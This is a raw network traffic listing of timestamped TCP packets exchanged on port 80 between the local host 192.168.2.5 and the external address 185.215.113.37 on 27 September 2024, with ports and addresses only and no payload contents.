Sep 27, 2024 04:14:12.992033005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992033958 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992048025 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992062092 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992067099 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992067099 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992075920 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992089987 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992108107 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992125034 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992171049 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992336035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992351055 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992366076 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992379904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992382050 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992394924 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992396116 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992405891 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992439985 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992439985 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992479086 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992499113 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992513895 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992527962 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992535114 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992535114 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992542982 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992564917 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992564917 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992614031 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992629051 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992686987 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992749929 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992765903 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992779970 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992790937 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992794991 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992810011 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992811918 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992824078 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992825031 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992832899 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992839098 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992854118 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992866993 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.992867947 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992867947 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992881060 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.992933989 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993129015 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993144035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993158102 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993171930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993186951 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993196964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993196964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993201017 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993216038 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993227959 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993236065 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993258953 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993264914 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993264914 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993273020 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993285894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993295908 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993295908 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993299961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993309975 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993314028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993329048 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993330002 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993343115 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993347883 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993356943 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993371010 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993385077 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993386030 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993386030 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993398905 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993412971 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993417025 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993427992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.993455887 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993455887 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.993488073 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.994048119 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994061947 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994076014 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994090080 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994103909 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994116068 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.994116068 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.994117022 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994131088 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994143963 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994157076 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994163990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.994163990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.994170904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994185925 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994198084 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994210958 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.994210958 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.994211912 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994225979 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994240999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994254112 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994254112 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.994254112 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.994267941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994282007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994292021 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.994296074 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994304895 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.994391918 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.994576931 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994592905 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.994620085 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.994802952 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.082628012 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.082644939 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.082668066 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.082691908 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.082705975 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.082720041 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.082804918 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.082818985 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.082820892 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.082840919 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.082874060 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.082874060 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.082942009 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.082956076 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.082968950 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.082983017 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.082984924 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083020926 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083040953 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083040953 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083051920 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083065987 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083081007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083112955 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083112955 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083133936 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083158016 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083208084 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083267927 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083334923 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083354950 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083357096 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083405972 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083406925 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083430052 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083445072 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083457947 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083481073 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083487988 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083487988 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083503962 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083544016 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083564997 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083578110 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083592892 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083604097 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083607912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083619118 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083632946 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083632946 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083708048 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083709955 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083724022 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083739042 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083753109 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083755970 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083771944 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083782911 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083821058 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083857059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083870888 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083884001 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083898067 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083904028 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083914995 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.083925962 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083925962 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083954096 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083954096 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.083981037 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084028006 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084115028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084130049 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084141970 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084150076 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084156990 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084171057 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084172964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084184885 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084187984 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084198952 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084212065 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084225893 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084227085 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084238052 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084249973 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084285975 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084386110 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084398985 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084414005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084427118 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084458113 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084458113 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084538937 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084553957 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084568977 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084578991 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084594965 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084609032 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084610939 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084610939 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084623098 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084635973 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084638119 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084649086 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084650993 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084666014 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084678888 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084681034 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084681034 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084693909 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084695101 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084707975 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084722996 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084739923 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.084741116 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084741116 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084762096 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084801912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.084992886 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085006952 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085022926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085038900 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085062027 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085062027 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085140944 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085155964 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085169077 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085182905 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085186005 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085196972 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085197926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085212946 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085221052 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085227966 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085242033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085254908 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085254908 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085256100 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085268974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085284948 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085298061 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085325956 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085325956 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085505962 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085565090 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085726023 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085740089 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085753918 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085772038 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085784912 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085784912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085784912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085798979 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085812092 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085814953 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085814953 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085825920 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085829973 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085839987 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085855007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085867882 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085871935 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085877895 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085884094 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085897923 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085911989 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085933924 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085933924 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085933924 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085948944 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.085954905 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085987091 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.085988045 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086213112 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086227894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086241007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086255074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086256027 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086277962 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086283922 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086283922 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086292982 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086308002 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086308002 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086322069 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086322069 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086334944 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086337090 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086352110 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086364031 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086364031 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086400032 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086400032 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086590052 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086612940 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086627007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086652994 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086652994 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086704016 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086730957 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086745977 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086760044 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086774111 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086786985 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086786985 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086787939 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086802006 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086810112 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:13.086815119 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086829901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:13.086844921 CEST	80	49704	185.215.113.37	192.168.2.5
